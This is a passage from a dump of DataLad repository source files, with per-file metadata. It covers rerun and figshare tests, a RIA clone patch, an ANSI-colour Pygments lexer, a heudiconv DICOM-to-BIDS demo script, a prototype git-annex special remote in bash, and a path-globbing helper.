|/\n # | o b_R\n # |/\n # o a_n\n eq_(ds_repo.get_hexsha(\"HEAD~2\"),\n ds_repo.get_hexsha(DEFAULT_BRANCH + \"~2\"))\n neq_(ds_repo.get_hexsha(\"HEAD^2\"),\n ds_repo.get_hexsha(DEFAULT_BRANCH + \"^2\"))\n neq_(ds_repo.get_hexsha(\"HEAD^^2\"),\n ds_repo.get_hexsha(DEFAULT_BRANCH + \"^^2\"))\n assert_false(ds_repo.commit_exists(\"HEAD^^2^2\"))\n eq_(ds_repo.get_hexsha(\"HEAD^2^^\"),\n ds_repo.get_hexsha(DEFAULT_BRANCH + \"^2^^\"))\n\n ds_repo.checkout(DEFAULT_BRANCH)\n hexsha_before = ds_repo.get_hexsha()\n ds.rerun(since=\"\")\n eq_(hexsha_before, ds_repo.get_hexsha())\n\n\n@slow\n# test implementation requires checkout of non-adjusted branch\n@skip_if_adjusted_branch\n@with_tempfile(mkdir=True)\ndef test_rerun_octopus(path=None):\n ds = Dataset(path).create()\n # keep direct repo accessor to speed things up\n ds_repo = ds.repo\n ds.run(\"echo foo >>foo\")\n with open(op.join(ds.path, \"non-run\"), \"w\") as nrfh:\n nrfh.write(\"non-run\")\n ds.save()\n ds_repo.checkout(DEFAULT_BRANCH + \"~\", options=[\"-b\", \"topic-1\"])\n ds.run(\"echo bar 
>bar\")\n ds_repo.checkout(DEFAULT_BRANCH + \"~\", options=[\"-b\", \"topic-2\"])\n ds.run(\"echo baz >baz\")\n ds_repo.checkout(DEFAULT_BRANCH)\n ds_repo.call_git(\n [\"merge\", \"-m\", \"Merge octopus\", \"topic-1\", \"topic-2\"])\n # o-. f_M\n # |\\ \\\n # | | o e_r\n # | o | d_r\n # | |/\n # o | c_n\n # |/\n # o b_r\n # o a_n\n\n ds.rerun(since=\"\", onto=\"\")\n neq_(ds_repo.get_hexsha(\"HEAD^3\"),\n ds_repo.get_hexsha(DEFAULT_BRANCH + \"^3\"))\n eq_(ds_repo.get_hexsha(\"HEAD~3\"),\n ds_repo.get_hexsha(DEFAULT_BRANCH + \"~3\"))\n\n ds_repo.checkout(DEFAULT_BRANCH)\n hexsha_before = ds_repo.get_hexsha()\n ds.rerun(since=\"\")\n eq_(hexsha_before,\n ds_repo.get_hexsha(DEFAULT_BRANCH + \"~\"))\n" }, { "alpha_fraction": 0.5803374648094177, "alphanum_fraction": 0.5906089544296265, "avg_line_length": 31.452381134033203, "blob_id": "2d281421c83ef077a1e69c3903da306d10e27d89", "content_id": "2ec5b26ba01a02d2edcac016ccb82e4a0aebcd6b", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1363, "license_type": "permissive", "max_line_length": 92, "num_lines": 42, "path": "/datalad/distributed/tests/test_export_to_figshare.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# -*- coding: utf-8 -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test export_to_figshare\"\"\"\n\nfrom datalad.api import (\n Dataset,\n export_archive,\n)\nfrom datalad.support import path as op\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.tests.utils_pytest import (\n eq_,\n with_tree,\n)\n\nfrom ..export_to_figshare import _get_default_title\n\n\n@with_tree({})\ndef test_get_default_title(path=None):\n repo = GitRepo(path)\n ds = Dataset(path)\n # There is no dataset initialized yet, so only path will be the title\n dirname = op.basename(path)\n eq_(_get_default_title(ds), dirname)\n\n # Initialize and get UUID\n ds.create(force=True)\n eq_(_get_default_title(ds), '{dirname}#{ds.id}'.format(**locals()))\n\n # Tag and get @version\n # cannot use ds.save since our tags are not annotated,\n # see https://github.com/datalad/datalad/issues/4139\n ds.repo.tag(\"0.1\", message=\"important version\")\n eq_(_get_default_title(ds), '{dirname}#{ds.id}@0.1'.format(**locals()))\n" }, { "alpha_fraction": 0.6597825884819031, "alphanum_fraction": 0.6597825884819031, "avg_line_length": 25.66666603088379, "blob_id": "490863793c1bd0809d9d848c37a4b306a379a100", "content_id": "c78cc99b9a741fddcc567725851adc69b51ff3c6", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1840, "license_type": "permissive", "max_line_length": 78, "num_lines": 69, "path": "/datalad/core/distributed/clone_ria.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "\"\"\"\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport logging\nfrom typing import Dict\n\nfrom datalad.distribution.dataset import Dataset\n# For now kept in clone_utils, to avoid circular import (see datalad-next)\nfrom .clone_utils import (\n postclone_preannex_cfg_ria,\n postclonecfg_ria,\n)\n\nfrom . 
import clone as mod_clone\n\n# we need to preserve the original functions to be able to call them\n# in the patch\norig_post_git_init_processing_ = mod_clone._post_git_init_processing_\norig_pre_final_processing_ = mod_clone._pre_final_processing_\n\n\nlgr = logging.getLogger('datalad.core.distributed.clone')\n\n\ndef _post_git_init_processing_(\n *,\n destds: Dataset,\n gitclonerec: Dict,\n remote: str,\n **kwargs\n):\n yield from orig_post_git_init_processing_(\n destds=destds, gitclonerec=gitclonerec, remote=remote,\n **kwargs)\n\n # In case of RIA stores we need to prepare *before* annex is called at all\n if gitclonerec['type'] == 'ria':\n postclone_preannex_cfg_ria(destds, remote=remote)\n\n\ndef _pre_final_processing_(\n *,\n destds: Dataset,\n gitclonerec: Dict,\n remote: str,\n **kwargs\n):\n if gitclonerec['type'] == 'ria':\n yield from postclonecfg_ria(destds, gitclonerec,\n remote=remote)\n\n yield from orig_pre_final_processing_(\n destds=destds, gitclonerec=gitclonerec, remote=remote,\n **kwargs)\n\n\ndef _apply():\n # apply patch in a function, to be able to easily patch it out\n # and turn off the patch\n lgr.debug(\n 'Apply RIA patch to clone.py:_post_git_init_processing_')\n mod_clone._post_git_init_processing_ = _post_git_init_processing_\n lgr.debug(\n 'Apply RIA patch to clone.py:_pre_final_processing_')\n mod_clone._pre_final_processing_ = _pre_final_processing_\n\n\n_apply()\n" }, { "alpha_fraction": 0.5038935542106628, "alphanum_fraction": 0.5137897729873657, "avg_line_length": 31.44210433959961, "blob_id": "7f24a7a4798074ad91c40448abffe25afd6c8ad5", "content_id": "205f4dedcd3eda6cf819dc80460801a893a7a450", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6164, "license_type": "permissive", "max_line_length": 79, "num_lines": 190, "path": "/docs/utils/pygments_ansi_color.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"Pygments lexer for text containing ANSI color codes.\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import unicode_literals\n\nimport itertools\nimport re\n\nimport pygments.lexer\nimport pygments.token\n\n\nColor = pygments.token.Token.Color\n\n_ansi_code_to_color = {\n 0: 'Black',\n 1: 'Red',\n 2: 'Green',\n 3: 'Yellow',\n 4: 'Blue',\n 5: 'Magenta',\n 6: 'Cyan',\n 7: 'White',\n}\n\n\ndef _token_from_lexer_state(bold, fg_color, bg_color):\n \"\"\"Construct a token given the current lexer state.\n\n We can only emit one token even though we have a multiple-tuple state.\n To do work around this, we construct tokens like \"BoldRed\".\n \"\"\"\n token_name = ''\n\n if bold:\n token_name += 'Bold'\n\n if fg_color:\n token_name += fg_color\n\n if bg_color:\n token_name += 'BG' + bg_color\n\n if token_name == '':\n return pygments.token.Text\n else:\n return getattr(Color, token_name)\n\n\ndef color_tokens(fg_colors, bg_colors):\n \"\"\"Return color tokens for a given set of colors.\n\n Pygments doesn't have a generic \"color\" token; instead everything is\n contextual (e.g. \"comment\" or \"variable\"). 
That doesn't make sense for us,\n where the colors actually *are* what we care about.\n\n This function will register combinations of tokens (things like \"Red\" or\n \"BoldRedBGGreen\") based on the colors passed in.\n\n You can also define the tokens yourself, but note that the token names are\n *not* currently guaranteed to be stable between releases as I'm not really\n happy with this approach.\n\n Usage:\n\n fg_colors = bg_colors = {\n 'Black': '#000000',\n 'Red': '#EF2929',\n 'Green': '#8AE234',\n 'Yellow': '#FCE94F',\n 'Blue': '#3465A4',\n 'Magenta': '#c509c5',\n 'Cyan': '#34E2E2',\n 'White': '#ffffff',\n }\n class MyStyle(pygments.styles.SomeStyle):\n styles = dict(pygments.styles.SomeStyle.styles)\n styles.update(color_tokens(fg_colors, bg_colors))\n \"\"\"\n styles = {}\n\n for bold, fg_color, bg_color in itertools.product(\n (False, True),\n {None} | set(fg_colors),\n {None} | set(bg_colors),\n ):\n token = _token_from_lexer_state(bold, fg_color, bg_color)\n if token is not pygments.token.Text:\n value = []\n if bold:\n value.append('bold')\n if fg_color:\n value.append(fg_colors[fg_color])\n if bg_color:\n value.append('bg:' + bg_colors[bg_color])\n styles[token] = ' '.join(value)\n\n return styles\n\n\nclass AnsiColorLexer(pygments.lexer.RegexLexer):\n name = 'ANSI Color'\n aliases = ('ansi-color', 'ansi', 'ansi-terminal')\n flags = re.DOTALL | re.MULTILINE\n\n def __init__(self, *args, **kwargs):\n super(AnsiColorLexer, self).__init__(*args, **kwargs)\n self.reset_state()\n\n def reset_state(self):\n self.bold = False\n self.fg_color = None\n self.bg_color = None\n\n @property\n def current_token(self):\n return _token_from_lexer_state(\n self.bold, self.fg_color, self.bg_color,\n )\n\n def process(self, match):\n \"\"\"Produce the next token and bit of text.\n\n Interprets the ANSI code (which may be a color code or some other\n code), changing the lexer state and producing a new token. If it's not\n a color code, we just strip it out and move on.\n\n Some useful reference for ANSI codes:\n * http://ascii-table.com/ansi-escape-sequences.php\n \"\"\"\n # \"after_escape\" contains everything after the start of the escape\n # sequence, up to the next escape sequence. 
We still need to separate\n # the content from the end of the escape sequence.\n after_escape = match.group(1)\n\n # TODO: this doesn't handle the case where the values are non-numeric.\n # This is rare but can happen for keyboard remapping, e.g.\n # '\\x1b[0;59;\"A\"p'\n parsed = re.match(\n r'([0-9;=]*?)?([a-zA-Z])(.*)$',\n after_escape,\n re.DOTALL | re.MULTILINE,\n )\n if parsed is None:\n # This shouldn't ever happen if we're given valid text + ANSI, but\n # people can provide us with utter junk, and we should tolerate it.\n text = after_escape\n else:\n value, code, text = parsed.groups()\n\n if code == 'm': # \"m\" is \"Set Graphics Mode\"\n # Special case \\x1b[m is a reset code\n if value == '':\n self.reset_state()\n else:\n values = value.split(';')\n for value in values:\n try:\n value = int(value)\n except ValueError:\n # Shouldn't ever happen, but could with invalid\n # ANSI.\n continue\n else:\n fg_color = _ansi_code_to_color.get(value - 30)\n bg_color = _ansi_code_to_color.get(value - 40)\n if fg_color:\n self.fg_color = fg_color\n elif bg_color:\n self.bg_color = bg_color\n elif value == 1:\n self.bold = True\n elif value == 22:\n self.bold = False\n elif value == 39:\n self.fg_color = None\n elif value == 49:\n self.bg_color = None\n elif value == 0:\n self.reset_state()\n\n yield match.start(), self.current_token, text\n\n tokens = {\n # states have to be native strings\n str('root'): [\n (r'\\x1b\\[([^\\x1b]*)', process),\n (r'[^\\x1b]+', pygments.token.Text),\n ],\n }\n" }, { "alpha_fraction": 0.7732600569725037, "alphanum_fraction": 0.7851648330688477, "avg_line_length": 83, "blob_id": "12b0302fa6a5e7d83e3c075561a787010eb8fac9", "content_id": "2b86628c7f80275d0a2d60c6db47b20b3946a164", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 5460, "license_type": "permissive", "max_line_length": 312, "num_lines": 65, "path": "/docs/casts/heudiconv_dicom_to_bids.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "full_title=\"Demo of automatic conversion of DICOMs into BIDS and managing data using DataLad\"\nrun \"set -eu # Fail early if any error happens\"\nsay \"Heudiconv (Heuristic DICOM Converter, https://github.com/nipy/heudiconv) now allows to create DataLad datasets with your neuroimaging data as soon as it comes from the MRI scanner.\"\n\nsay \"In this example we will use a heudiconv heuristic developed and used at DBIC (Dartmouth Brain Imaging Center) to have all collected data made available as BIDS datasets. 
See http://goo.gl/WEoCge describing the naming convention.\"\n\nsay \"We will demonstrate it on some data acquired on a phantom, mimicking multiple studies/subjects/sessions setup, and already available through datalad:\"\nrun \"datalad install -r -g -J4 ///dicoms/dartmouth-phantoms/bids_test4-20161014\"\nsay \"We will now run heudiconv pointing to the DBIC heuristic on data for the first five sessions (could be done one scanning session at a time, or entire directory as well), while instructing heudiconv to place produced data under DataLad control.\"\nsay \"First we will download the heuristic file from heudiconv's repository:\"\nrun \"wget https://raw.githubusercontent.com/nipy/heudiconv/master/heuristics/dbic_bids.py\"\n\nsay \"and then run heudiconv instructing to process multiple sessions, and place all converted data under a dataset called 'demo' (for the purpose of the demo we will convert only all anatomicals):\"\nrun \"heudiconv --bids --datalad -f ./dbic_bids.py -o demo bids_test4-20161014/phantom-[1-5]/*{scout,T1w}*\"\n\nsay \"Heudiconv has created a hierarchy of DataLad datasets, with levels PI/Researcher/study\"\nrun \"datalad ls -r demo\"\n\nsay \"where separate scanning sessions detected by heudiconv were contributed as separate commits to the sub-dataset corresponding to the specific study (as discovered from 'Study Description' field in DICOM):\"\nrun \"cd demo/Halchenko/Yarik/950_bids_test4\"\nrun \"git log --pretty=oneline\"\n\nsay \"Not only were all DICOMs converted into a BIDS-compliant dataset, but this heuristic also provided templates for mandatory files in BIDS format, some of which were placed directly under git to ease modification and integration of changes:\"\nrun \"cat dataset_description.json\"\nsay \"and you can easily find files/fields which need adjustment with information only you might know (design, author, license, etc) by searching for TODO\"\nrun \"git grep TODO\"\nsay \"All binary data and otherwise 'sensitive' files (e.g. _scans.tsv files) were placed under git-annex control:\"\nrun \"git annex list\"\n\nsay \"Original DICOMs, converted anatomicals (which are not yet defaced), and _scans.tsv files also obtained a meta-data tag to allow easy identification of data which did not go through the anonymization step yet and might potentially contain subject-identifying information:\"\nrun \"datalad metadata sourcedata/sub-phantom1sid1\"\n\nsay \"These datasets are ready to be installed from this location to the processing box. In the demo we will just perform it on the localhost and only for the current study since sub-datasets are independent of their supers:\"\nrun 'datalad install -g -r -s localhost:$PWD ~/950_bids_test4-process'\nrun \"cd ~/950_bids_test4-process\"\n\nsay \"Data could now be processed/analyzed/etc in this dataset 'sibling'.\"\n\nsay \"According to BIDS, derivative (e.g. preprocessed) data should reside under derivatives/, so we create a new subdataset\"\nrun \"datalad create -d . 
derivatives/preprocess1\"\nsay \"and do our thorough preprocessing (see http://bids-apps.neuroimaging.io for ready-to-use pipelines like mriqc and fmriprep), in our case a sample brain extraction:\"\nrun \"source /etc/fsl/fsl.sh # to enable FSL on NeuroDebian systems\"\nrun \"mkdir -p derivatives/preprocess1/sub-phantom1sid1/ses-localizer/anat/ # create target output directory\"\nrun \"bet {,derivatives/preprocess1/}sub-phantom1sid1/ses-localizer/anat/sub-phantom1sid1_ses-localizer_T1w.nii.gz\"\n\nsay \"To keep control over the versions of all data we work with, we add results of pre-processing under DataLad version control\"\nrun \"datalad save -m 'added initial preprocessing (well -- BETing output)' derivatives/preprocess1/*\"\nsay \"and then also adjust the meta-data templates heudiconv pre-generated for us:\"\nrun \"sed -i -e 's,First1 Last1,Data Lad,g' -e '/TODO/d' dataset_description.json\"\nsay \"We save all changes accumulated so far\"\nrun \"datalad save -m 'Finished initial preprocessing, specified PI in dataset description and removed TODOs.'\"\n\nsay \"Whenever more data is acquired, heudiconv conversion could be run again to complement previously acquired datasets with new data.\"\nrun \"cd\"\nrun \"heudiconv --bids --datalad -f ./dbic_bids.py -o demo bids_test4-20161014/phantom-[6-9]/*{scout,T1w}*\"\n\nsay \"Now we can go to the processing 'box' again and update the entire hierarchy of datasets (in our case actually just one, but we could have cloned the entire tree for a PI) while incorporating possible changes already made on the processing box, with git tracking the entire history of modifications.\"\nrun \"cd ~/950_bids_test4-process\"\nrun \"datalad update --merge -r\"\nrun \"git status # all clear\"\nrun \"cat dataset_description.json # and our changes are still in place\"\nsay \"Now you could process newly acquired data... 
rinse repeat, while keeping the full history of actions:\"\nrun \"git log --pretty=oneline\"\n\nsay \"See also demos on how data could be exported and/or published whenever you are ready to share it publicly or with your collaborators.\"\n" }, { "alpha_fraction": 0.6126071214675903, "alphanum_fraction": 0.616891086101532, "avg_line_length": 35.31111145019531, "blob_id": "41f196400e07289ac88d20bbe279f4b9c433b83a", "content_id": "e575c153886143ecf7c15bfbbced464c911e916c", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1634, "license_type": "permissive", "max_line_length": 87, "num_lines": 45, "path": "/datalad/coreapi.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Python DataLad core API exposing essential command used by other DataLad commands\"\"\"\n\n# Should have no spurious imports/definitions at the module level\nfrom .distribution.dataset import Dataset\n\n\ndef _generate_func_api():\n \"\"\"Auto detect all available interfaces and generate a function-based\n API from them\n \"\"\"\n from importlib import import_module\n\n # load extensions requested by configuration\n import datalad\n if datalad.get_apimode() == 'python':\n # only do this in Python API mode, because the CLI main\n # will have done this already\n from datalad.support.entrypoints import load_extensions\n load_extensions()\n\n from .interface.base import get_interface_groups\n from .interface.base import get_api_name\n\n for grp_name, grp_descr, interfaces in get_interface_groups():\n for intfspec in interfaces:\n # turn the interface spec into an instance\n mod = import_module(intfspec[0], package='datalad')\n intf = getattr(mod, intfspec[1])\n api_name = get_api_name(intfspec)\n globals()[api_name] = intf.__call__\n\n\n# Invoke above helper\n_generate_func_api()\n\n# Be nice and clean up the namespace properly\ndel _generate_func_api\n" }, { "alpha_fraction": 0.6406118869781494, "alphanum_fraction": 0.6496227979660034, "avg_line_length": 25.21977996826172, "blob_id": "282c2a22023ec0a9a0d7cd5ee8518a0ef1ff908b", "content_id": "52a3ca940f42651a300c550a7d64a15554cd55e8", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 4772, "license_type": "permissive", "max_line_length": 73, "num_lines": 182, "path": "/sandbox/git-annex-remote-gitobjects", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\n#\tbash - for string indexing\n#\n# git-annex external special remote prototype to test feasibility of\n# using regular git objects and refs to store content of files in remote\n# git objects store.\n#\n# Pros:\n# - could work with any git repository hosting, even the one which does\n# not support annex\n#\n# Cons:\n# - at this point it is more of a \"proof of concept\"\n# - longevity of those references on the remote is not guaranteed\n# - it is quite slow, so should be used for relatively small load\n#\n# Discussion and possibly more ways it could be improved are available\n# from https://github.com/datalad/datalad/pull/3727\n#\n# 
Based on an example of git annex special remote, which is\n# Copyright 2013 Joey Hess; licenced under the GNU GPL version 3 or higher.\n# Tuned for the gitobjects type remote by Yaroslav Halchenko, 2019-2020\n#\n\nset -e\n\n# This program speaks a line-based protocol on stdin and stdout.\n# When running any commands, their stdout should be redirected to stderr\n# (or /dev/null) to avoid messing up the protocol.\nruncmd () {\n\techo DEBUG \"Running $@\"\n\t\"$@\" >/dev/null 2>&1 # &2\n}\n\n# Prevent any gc so we could avoid objects being packed before we get\n# rid of them\nrungitcmd () {\n\truncmd git -c gc.auto=0 \"$@\"\n}\n\n# Gets a value from the remote's configuration, and stores it in RET\ngetconfig () {\n\task GETCONFIG \"$1\"\n}\n\n# Stores a value in the remote's configuration.\nsetconfig () {\n\techo SETCONFIG \"$1\" \"$2\"\n}\n\n# Sets ref to the reference to use to store a key.\ncalcref () {\n\tref=\"refs/annex-gitobjects/$1\"\n}\n\ncalcobjfile () {\n\tobjfile=\"$gitdir/objects/${h:0:2}/${h:2}\"\n\techo DEBUG \"objfile=$objfile\"\n}\n\n# Asks for some value, and stores it in RET\nask () {\n\techo \"$1\" \"$2\"\n\tread resp\n\t# Tricky POSIX shell code to split first word of the resp,\n\t# preserving all other whitespace\n\tcase \"${resp%% *}\" in\n\t\tVALUE)\n\t\t\tRET=\"$(echo \"$resp\" | sed 's/^VALUE \\?//')\"\n\t\t;;\n\t\t*)\n\t\t\tRET=\"\"\n\t\t;;\n\tesac\n}\n\ncleanup () {\n\t# remove reference and object locally\n\trungitcmd update-ref -d \"$ref\"\n\tif [ \"$knownobj\" = '' ]; then\n\t\trm -f \"$objfile\"\n\tfi\n}\n\ngitdir=$(git rev-parse --git-dir)\n\n# This has to come first, to get the protocol started.\necho VERSION 1\n\nwhile read line; do\n\tset -- $line\n\tcase \"$1\" in\n\t\tINITREMOTE)\n\t\t\t# Nothing todo I think\n\t\t\techo INITREMOTE-SUCCESS\n\t\t;;\n\t\tPREPARE)\n\t\t\t# TODO: should probably request remote url not already existing\n\t\t\t# remote... think more, to speed things up, we use existing one\n\t\t\tgetconfig remote\n\t\t\tremote=\"$RET\"\n\t\t\t# just to check that all is kosher\n\t\t\tif git remote get-url \"$remote\" >/dev/null 2>&1; then\n\t\t\t\techo PREPARE-SUCCESS\n\t\t\telse\n\t\t\t\techo PREPARE-FAILURE \"$remote is either unknown or has no url\"\n\t\t\tfi\n\t\t;;\n\t\tTRANSFER)\n\t\t\top=\"$2\"\n\t\t\tkey=\"$3\"\n\t\t\tshift 3\n\t\t\tfile=\"$@\"\n\n\t\t\tcalcref \"$key\"\n\t\t\tcase \"$op\" in\n\t\t\t\tSTORE)\n\t\t\t\t\t# Store the file to a location\n\t\t\t\t\t# based on the key.\n\t\t\t\t\t# We will need to do it twice ATM to make sure that we do\n\t\t\t\t\t# not wipe out object which magically already exists\n\t\t\t\t\th=$(git -c gc.auto=0 hash-object --stdin < \"$file\")\n\t\t\t\t\tcalcobjfile \"$h\"\n\t\t\t\t\tknownobj=$( [ -e \"$objfile\" ] && echo 1 || echo '' )\n\t\t\t\t\techo DEBUG knownobj=$knownobj\n\t\t\t\t\t# now with -w\n\t\t\t\t\trungitcmd hash-object --stdin -w < \"$file\"\n\t\t\t\t\t# create a reference for that object with the key in it\n\t\t\t\t\trungitcmd update-ref \"$ref\" \"$h\"\n\t\t\t\t\t# push that reference (and corresponding object) to the remote\n\t\t\t\t\trungitcmd push \"$remote\" \"$ref:$ref\"\n\t\t\t\t\tcleanup\n\t\t\t\t\techo TRANSFER-SUCCESS STORE \"$key\"\n\t\t\t\t\t# TODO: chain to report TRANSFER-FAILURE\n\t\t\t\t;;\n\t\t\t\tRETRIEVE)\n\t\t\t\t\t# TODO: we cannot know for sure if object existed prior!\n\t\t\t\t\t# since we don't know object hash. 
may be we should save\n\t\t\t\t\t# it into the STATE and use that to check first\n\t\t\t\t\tknownobj=''\n\t\t\t\t\t# TODO: interface progress reporting\n\t\t\t\t\trungitcmd fetch \"$remote\" \"$ref:$ref\"\n\t\t\t\t\techo DEBUG \"getting git hexsha\"\n\t\t\t\t\th=$(git -c gc.auto=0 show-ref -s \"$ref\")\n\t\t\t\t\tcalcobjfile \"$h\"\n\t\t\t\t\techo DEBUG \"cat-file $ref into $file\"\n\t\t\t\t\tgit -c gc.auto=0 cat-file -p \"$ref\" > \"$file\"\n\t\t\t\t\techo DEBUG done - you must have a file\n\t\t\t\t\tcleanup\n\t\t\t\t\techo TRANSFER-SUCCESS RETRIEVE \"$key\"\n\t\t\t\t\t# TODO: chain to report TRANSFER-FAILURE\n\t\t\t\t;;\n\t\t\tesac\n\t\t;;\n\t\tCHECKPRESENT)\n\t\t\t# TODO: ATM expensive since probably fetching a reference\n\t\t\t# would fetch the object?\n\t\t\tkey=\"$2\"\n\t\t\tcalcref \"$key\"\n\t\t\trungitcmd ls-remote --exit-code \"$remote\" \"$ref\" \\\n\t\t\t\t&& echo CHECKPRESENT-SUCCESS \"$key\" \\\n\t\t\t\t|| echo CHECKPRESENT-FAILURE \"$key\"\n\t\t\trm -f \"$gitdir/$ref\"\n\t\t;;\n\t\tREMOVE)\n\t\t\tkey=\"$2\"\n\t\t\tcalcref \"$key\"\n\t\t\trungitcmd push \"$remote\" \":$ref\" \\\n\t\t\t&& echo \"REMOVE-SUCCESS $key\" \\\n\t\t\t|| echo \"REMOVE-FAILURE $key Who knows why?\"\n\t\t;;\n\t\tGETINFO)\n\t\t\techo INFOFIELD \"remote\"\n\t\t\techo INFOVALUE \"$remote\"\n\t\t\techo INFOEND\n\t\t;;\n\n\t\t*)\n\t\t\techo UNSUPPORTED-REQUEST\n\t\t;;\n\tesac\ndone\n" }, { "alpha_fraction": 0.5489262938499451, "alphanum_fraction": 0.5503652691841125, "avg_line_length": 36.641666412353516, "blob_id": "4f562734c77e116683be290468e3363f21b9f539", "content_id": "69d3859fd102236466f0e26818192934ca32f788", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9034, "license_type": "permissive", "max_line_length": 123, "num_lines": 240, "path": "/datalad/support/globbedpaths.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Wrapper for globbing paths.\n\"\"\"\n\nfrom __future__ import annotations\n\nimport glob\nimport logging\nimport os.path as op\nfrom functools import lru_cache\nfrom itertools import chain\nfrom typing import (\n Iterable,\n Optional,\n)\n\nfrom datalad.utils import (\n chpwd,\n ensure_unicode,\n getpwd,\n partition,\n)\n\nlgr = logging.getLogger('datalad.support.globbedpaths')\n\n\nclass GlobbedPaths(object):\n \"\"\"Helper for globbing paths.\n\n Parameters\n ----------\n patterns : list of str\n Call `glob.glob` with each of these patterns. \".\" is considered as\n datalad's special \".\" path argument; it is not passed to glob and is\n always left unexpanded. 
Each set of glob results is sorted\n alphabetically.\n pwd : str, optional\n Glob in this directory.\n expand : bool, optional\n Whether the `paths` property returns unexpanded or expanded paths.\n \"\"\"\n\n def __init__(self, patterns: Optional[Iterable[str | bytes]], pwd: Optional[str] = None, expand: bool = False) -> None:\n self.pwd = pwd or getpwd()\n self._expand = expand\n\n self._maybe_dot: list[str]\n self._patterns: list[str]\n if patterns is None:\n self._maybe_dot = []\n self._patterns = []\n else:\n pattern_strs = list(map(ensure_unicode, patterns))\n pattern_iter, dots = partition(pattern_strs, lambda i: i.strip() == \".\")\n self._maybe_dot = [\".\"] if list(dots) else []\n self._patterns = [op.relpath(p, start=pwd) if op.isabs(p) else p\n for p in pattern_iter]\n self._cache: dict[str, dict[str, list[str]]] = {}\n self._expanded_cache: dict[tuple[str, bool, bool], list[str]] = {}\n\n def __bool__(self) -> bool:\n return bool(self._maybe_dot or self._patterns)\n\n @staticmethod\n @lru_cache()\n def _get_sub_patterns(pattern: str) -> list[str]:\n \"\"\"Extract sub-patterns from the leading path of `pattern`.\n\n The right-most path component is successively peeled off until there\n are no patterns left.\n \"\"\"\n head, tail = op.split(pattern)\n if not tail:\n # Pattern ended with a separator. Take the first directory as the\n # base.\n head, tail = op.split(head)\n\n sub_patterns = []\n seen_magic = glob.has_magic(tail)\n while head:\n new_head, tail = op.split(head)\n if seen_magic and not glob.has_magic(head):\n break\n elif not seen_magic and glob.has_magic(tail):\n seen_magic = True\n\n if seen_magic:\n sub_patterns.append(head + op.sep)\n head = new_head\n return sub_patterns\n\n def _expand_globs(self) -> tuple[dict[str, list[str]], dict[str, list[str]], dict[str, list[str]]]:\n def normalize_hit(h: str) -> str:\n normalized = op.relpath(h) + (\"\" if op.basename(h) else op.sep)\n if h == op.curdir + op.sep + normalized:\n # Don't let relpath prune \"./fname\" (gh-3034).\n return h\n return normalized\n\n hits: dict[str, list[str]] = {}\n partial_hits: dict[str, list[str]] = {}\n misses: dict[str, list[str]] = {}\n with chpwd(self.pwd):\n for pattern in self._patterns:\n full_hits = glob.glob(pattern, recursive=True)\n if full_hits:\n hits[pattern] = sorted(map(normalize_hit, full_hits))\n else:\n lgr.debug(\"No matching files found for '%s'\", pattern)\n # We didn't find a hit for the complete pattern. If we find\n # a sub-pattern hit, that may mean we have an uninstalled\n # subdataset.\n for sub_pattern in self._get_sub_patterns(pattern):\n sub_hits = glob.glob(sub_pattern, recursive=True)\n if sub_hits:\n partial_hits[pattern] = sorted(\n map(normalize_hit, sub_hits))\n break\n else:\n misses[pattern] = [pattern]\n return hits, partial_hits, misses\n\n def expand(self, full: bool = False, dot: bool = True, refresh: bool = False,\n include_partial: bool = True, include_misses: bool = True) -> list[str]:\n \"\"\"Return paths with the globs expanded.\n\n Globbing is done with `glob.glob`. If a pattern doesn't have a match,\n the trailing path component of the pattern is removed and, if any globs\n remain, `glob.glob` is called again with the new pattern. 
